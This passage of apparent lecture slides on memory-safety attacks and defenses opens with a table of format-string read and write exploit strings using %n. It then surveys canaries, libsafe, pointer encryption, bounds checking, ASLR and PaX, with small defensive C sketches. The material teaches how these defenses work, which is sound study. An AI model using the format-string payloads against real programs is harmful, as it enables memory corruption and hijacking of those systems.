- Can read from arbitrary memory location!
- Writes also possible, using %n.

Format-string Exploits
- Exploit technique just discussed is well-known.
- Key observations:
  1. DIS and LEN completely characterize any printf call.
  2. Each byte in buf instructs printf what to do next.

Examples
LEN/DIS | Read exploit | Write exploit
7 | “a1a2a3a4%s” | No exploit
4, 16 | “a1a2a3a4%d%s” | “%234Lg%na1a2a3a4”
 | “%Lx%ld%sa1a2a3a4” | “a1a2a3a4%%%229x%n”
8 | “a1a2a3a4%Lx%s” | “a1a2a3a4%230g%n”
 | “%Lg%Lg%sa1a2a3a4” | “a1a2a3a4%137g%93g%n”
20 | “a1a2a3a4%Lg%g%s” | “a1a2a3a4%210Lg%20g%n”
24 | “a1a2a3a4%Lg%Lg%s” | “a1a2a3a4%61Lg%169Lg%n”
32 | “a1a2a3a4%g%Lg%Lg%s” | “a1a2a3a4%78Lg%80g%72Lg%n”

Preventing Buffer Overflows
- Use safe programming languages, e.g., Java
  - What about legacy C code?
- Black-box testing with long strings
- Mark stack as non-executable
- Randomize stack location or encrypt return address on stack by XORing with random string
  - Attacker won’t know what address to use in his string
- Run-time checking of array and buffer bounds
  - StackGuard, libsafe, many other tools
- Static analysis of source code to find overflows

Non-Executable Stack
- NX bit on every Page Table Entry
  - AMD Athlon 64, Intel P4 “Prescott”, but not 32-bit x86
  - Code patches marking stack segment as non-executable exist for Linux, Solaris, OpenBSD
- Some applications need executable stack
  - For example, LISP interpreters
- Does not defend against return-to-libc exploits
  - Overwrite return address with the address of an existing library function (can still be harmful)
- …nor against heap and function pointer overflows

Run-Time Checking: “Canaries” on the stack
- Embed “canaries” in stack frames and verify their integrity prior to function return
  - Any overflow of local variables will damage the canary
- Stack layout, starting from the top of stack: buf (local variables) | canary | sfp (pointer to previous frame) | ret addr (return execution to this address) | frame of the calling function
- Choose random canary string on program start
  - Attacker can’t guess what the value of canary will be
- Terminator canary: “\0”, newline, linefeed, EOF
  - String functions like strcpy won’t copy beyond “\0”
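
The canary check can be illustrated with a simulated frame. The sketch below is an assumption-laden model, not StackGuard itself: the frame is a plain byte array laid out as buf | canary | sfp | ret addr, all names are hypothetical, and the "overflow" is clamped to that array so the demonstration never writes outside its own memory. A real implementation would pick the canary at random on program start.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum { BUF_LEN = 8, FRAME_LEN = BUF_LEN + 3 * sizeof(uint32_t) };

/* Simulated frame as one byte array: buf | canary | sfp | ret addr. */
typedef struct {
    unsigned char bytes[FRAME_LEN];
    uint32_t expected_canary; /* reference copy kept outside the frame */
} sim_frame;

/* Function prologue: place the canary just above buf. */
static void frame_init(sim_frame *f, uint32_t canary) {
    assert(f != NULL);
    memset(f->bytes, 0, sizeof f->bytes);
    f->expected_canary = canary;
    memcpy(f->bytes + BUF_LEN, &canary, sizeof canary);
}

/* Unchecked copy into buf, clamped to the simulated frame so that the
   demonstration itself stays within its own array. */
static void frame_unsafe_copy(sim_frame *f, const void *src, size_t n) {
    assert(f != NULL && src != NULL);
    if (n > sizeof f->bytes) n = sizeof f->bytes;
    memcpy(f->bytes, src, n);
}

/* Function epilogue: 1 if the canary is intact, 0 if it was overwritten. */
static int frame_canary_ok(const sim_frame *f) {
    uint32_t now;
    memcpy(&now, f->bytes + BUF_LEN, sizeof now);
    return now == f->expected_canary;
}
```

Copying 6 bytes into the 8-byte buf leaves frame_canary_ok() returning 1; copying 16 bytes runs over the canary before it reaches the saved return address, so the check returns 0 and the function would abort instead of returning.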

Canary Implementation
- Requires code recompilation
- Checking canary integrity prior to every function return causes a performance penalty
  - For example, 8% for Apache Web server
- This defense can be defeated!
  - Phrack article by Bulba and Kil3r

Protecting more than just return addresses
- Rearrange stack layout to prevent pointer overflow
- Stack layout (the stack grows in one direction, strings grow in the opposite direction):
  - args: no arrays or pointers
  - return address
  - SFP
  - CANARY
  - arrays
  - local variables: ptrs, but no arrays
- Cannot overwrite any pointers by overflowing an array

Run-Time Checking: Safe libraries
- Dynamically loaded library
- Intercepts calls to strcpy(dest,src)
  - Checks if there is sufficient space in current stack frame: |frame-pointer - dest| > strlen(src)
  - If yes, does strcpy; else terminates application
- Diagram, starting from the top of stack: libsafe frame (sfp, ret-addr, dest, src) above main frame (buf, sfp, ret-addr)
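
The bounds test on this slide can be written out directly. The sketch below is a simplified model and not libsafe's actual code: checked_strcpy is a hypothetical name, the frame pointer is passed in explicitly instead of being read from the stack, and the function returns 0 where libsafe would terminate the application.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Copies src to dest only if |frame_pointer - dest| > strlen(src).
   Returns 1 if the copy was performed, 0 if it was refused. */
static int checked_strcpy(char *dest, const char *src, uintptr_t frame_pointer) {
    assert(dest != NULL && src != NULL);
    uintptr_t d = (uintptr_t)dest;
    size_t room = frame_pointer > d ? (size_t)(frame_pointer - d)
                                    : (size_t)(d - frame_pointer);
    if (room > strlen(src)) {
        strcpy(dest, src); /* fits below the saved frame pointer */
        return 1;
    }
    return 0; /* libsafe would terminate the application here */
}
```

With a 16-byte buffer whose end is treated as the frame pointer, a 5-character string is copied, while a 19-character string is refused because the copy would reach the saved frame pointer.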

Purify
- Instruments all memory accesses
- Works on relocatable object code
  - Links to modified malloc() that supports tracking tables
  - Inserts special instructions before each load and store instruction
- Detects all runtime memory errors and memory leaks
  - Violation of array bounds, use of uninitialized variables
- Mainly a debugging tool
  - Severe performance penalty (3-5 times slowdown)

Encrypting pointers in memory
- Attack: overflow a function pointer so that it points to attack code
- Idea: encrypt all pointers while in memory
  - Generate a random key when program is executed
  - Each pointer is XORed with this key when loaded from memory to registers or stored back into memory
  - Pointers cannot be overflown while in registers
- Attacker cannot predict the target program’s key
  - Even if pointer is overwritten, after XORing with key it will dereference to a “random” memory address

Normal Pointer Dereference
- Normal case: memory holds the pointer value 0x1234, and the data is at address 0x1234.
  1. CPU fetches pointer value
  2. CPU accesses data referenced by pointer
- Corrupted pointer: the pointer has been overwritten with 0x1340, the address of the attack code.
  1. CPU fetches pointer value
  2. CPU accesses attack code referenced by corrupted pointer

Dereference with encrypted pointers
- Normal case: memory holds the encrypted pointer 0x7239, and the data is at address 0x1234.
  1. CPU fetches pointer value and decrypts it to 0x1234
  2. CPU accesses data referenced by pointer
- Corrupted pointer: the encrypted pointer 0x7239 has been overwritten with 0x1340, the address of the attack code.
  1. CPU fetches pointer value and decrypts it; it decrypts to a random value, 0x9786
  2. CPU accesses random address; segmentation fault and crash
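
The XOR scheme can be sketched in a few lines. This is a toy model under stated assumptions: the function names are hypothetical, the key is passed in explicitly, and a real system would have the compiler insert these operations around every pointer load and store and would draw the key at random when the program starts.

```c
#include <assert.h>
#include <stdint.h>

/* Encrypt a pointer before it is stored in memory. */
static uintptr_t encrypt_ptr(const void *p, uintptr_t key) {
    assert(key != 0); /* a zero key would leave pointers unchanged */
    return (uintptr_t)p ^ key;
}

/* Address that a stored (possibly overwritten) value decrypts to. */
static uintptr_t decrypt_addr(uintptr_t stored, uintptr_t key) {
    return stored ^ key;
}

/* Decrypt a stored value back into a usable pointer. */
static void *decrypt_ptr(uintptr_t stored, uintptr_t key) {
    return (void *)decrypt_addr(stored, key);
}
```

A value produced by encrypt_ptr decrypts back to the original pointer. A raw address written by an attacker who does not know the key, such as 0x1340, decrypts to a different address, so the dereference lands somewhere the attacker did not choose.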

Issues with encrypted pointers
- Must be very fast
  - Pointer dereferences are very common
- Compiler issues
  - Must encrypt and decrypt only pointers
  - If compiler “spills” registers, unencrypted pointer values end up in memory and can be overwritten there
- Attacker should not be able to modify the key
  - Store key in its own non-writable memory page
- PG’d (PointGuard-protected) code doesn’t mix well with normal code
  - What if PG’d code needs to pass a pointer to OS kernel?

Dynamic Analysis
- Check for buffer overflows at runtime
  - Advantage: actual size of memory objects available
- There are many techniques, but most require modified pointer representation
  - To better keep track of where each pointer is pointing
- Jones and Kelly (1997): referent objects
  - Referent object = buffer to which the pointer points
  - Result of pointer arithmetic must point to same object
  - Idea: keep track of beginning and size of each object to determine whether a given pointer is “in bounds”
  - Does not require modification of pointer representation

Jones-Kelly Approach
- Pad each object by 1 byte
  - C permits a pointer to point to the byte right after an allocated memory object
- Maintain a runtime table of allocated objects
- Replace all out-of-bounds addresses with special ILLEGAL value at runtime
- Program crashes if pointer to ILLEGAL dereferenced
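
The referent-object check can be sketched with a small table of (base, size) pairs. This is a simplified model, not the Jones-Kelly implementation: the fixed-size array, the type names, and the function names are all assumptions for illustration, and the 1-byte padding that keeps adjacent objects apart is not modeled. The check accepts a result that lands inside the same object or exactly one byte past its end, and reports anything else as out of bounds (the case the slides call ILLEGAL).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum { MAX_OBJECTS = 16 };

typedef struct { uintptr_t base; size_t size; } object_entry;
typedef struct { object_entry entries[MAX_OBJECTS]; size_t count; } object_table;

static void table_init(object_table *t) { t->count = 0; }

/* Record an allocated object; returns 0 if the table is full. */
static int table_register(object_table *t, const void *base, size_t size) {
    assert(t != NULL && base != NULL);
    if (t->count == MAX_OBJECTS) return 0;
    t->entries[t->count].base = (uintptr_t)base;
    t->entries[t->count].size = size;
    t->count++;
    return 1;
}

/* Find the referent object of addr (one past the end still counts). */
static const object_entry *table_referent(const object_table *t, uintptr_t addr) {
    for (size_t i = 0; i < t->count; i++) {
        const object_entry *e = &t->entries[i];
        if (addr >= e->base && addr - e->base <= e->size) return e;
    }
    return NULL;
}

/* Would p + delta stay within p's referent object (or one past its end)?
   Returns 1 if so, 0 if the result would be ILLEGAL. */
static int arithmetic_in_bounds(const object_table *t, const void *p, ptrdiff_t delta) {
    const object_entry *e = table_referent(t, (uintptr_t)p);
    if (e == NULL) return 0;
    ptrdiff_t off = (ptrdiff_t)((uintptr_t)p - e->base) + delta;
    return off >= 0 && (size_t)off <= e->size;
}
```

For a registered 10-byte array a, offsets 9 and 10 from a are accepted, while offset 11 and an offset that moves before the start of the array are rejected. The check works on integer offsets only, so the sketch never forms an out-of-bounds pointer itself.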

Introducing Artificial Code Diversity
- Buffer overflow and return-to-libc exploits need to know the (virtual) address to which to pass control
  - Address of attack code in the buffer
  - Address of a standard kernel library routine
- Same address is used on many machines
  - Slammer infected 75,000 MS-SQL servers using same code on every machine
- Idea: introduce artificial diversity
  - Make stack addresses, addresses of library routines, etc. unpredictable and different from machine to machine

Address Space Randomization
- Randomly choose base address of stack, heap, code segment
- Randomly pad stack frames and malloc() calls
- Randomize location of Global Offset Table
- Randomization can be done at compile- or link-time, or by rewriting existing binaries
  - Threat: attack repeatedly probes randomized binary
- Several implementations available

PaX
- Linux kernel patch
- Goal: prevent execution of arbitrary code in an existing process’s memory space
- Enable executable/non-executable memory pages
- Any section not marked as executable in ELF binary is non-executable by default
  - Stack, heap, anonymous memory regions
- Access control in mmap(), mprotect() prevents changes to protection state during execution
- Randomize address space

Non-Executable Pages in PaX
- In x86, pages cannot be directly marked as non-executable
- PaX marks each page as “non-present” or “supervisor level access”
  - This raises a page fault on every access
- Page fault handler determines if the page fault occurred on a data access or instruction fetch
  - Instruction fetch: log and terminate process
  - Data access: unprotect temporarily and continue

Base-Address Randomization
- Note that only base address is randomized
  - Layouts of stack and library table remain the same
  - Relative distances between memory objects are not changed by base address randomization
- To attack, it’s enough to guess the base shift
- A 16-bit value can be guessed by brute force
  - Try 2^15 (on average) different overflows with different values for the address of a known library function
- Was broken in 2004 by a team from Stanford.
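
The 2^15 figure is the average number of guesses needed to hit one value chosen uniformly among 2^16 when candidates are tried without repetition. As a rough sketch, with expected_guesses as a hypothetical helper and the usual approximation of (2^bits + 1) / 2 by 2^(bits - 1):

```c
#include <assert.h>
#include <stdint.h>

/* Approximate expected number of guesses to find one value chosen
   uniformly among 2^bits, trying each candidate at most once. */
static uint64_t expected_guesses(unsigned bits) {
    assert(bits >= 1 && bits <= 63);
    return (uint64_t)1 << (bits - 1);
}
```

expected_guesses(16) is 32768, which a network attack can try in practice. For comparison, expected_guesses(40) is 549755813888, which is why widening the randomized range matters far more than the randomization mechanism itself.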

Ideas for Better Randomization
- 64-bit addresses
  - At least 40 bits available for randomization
  - Memory pages are usually between 4K and 4M in size
  - Brute-force attack on 40 bits is not feasible

Ideas for Better Randomization
- Randomly re-order entry points of library functions
  - Finding address of one function is no longer enough to compute addresses of other functions
  - What if attacker finds address of system()?
- … at compile-time
  - No virtual mem constraints (can use more randomness)
  - What are the disadvantages??
- … or at run-time
  - How are library functions shared among processes?
  - How does normal code find library functions?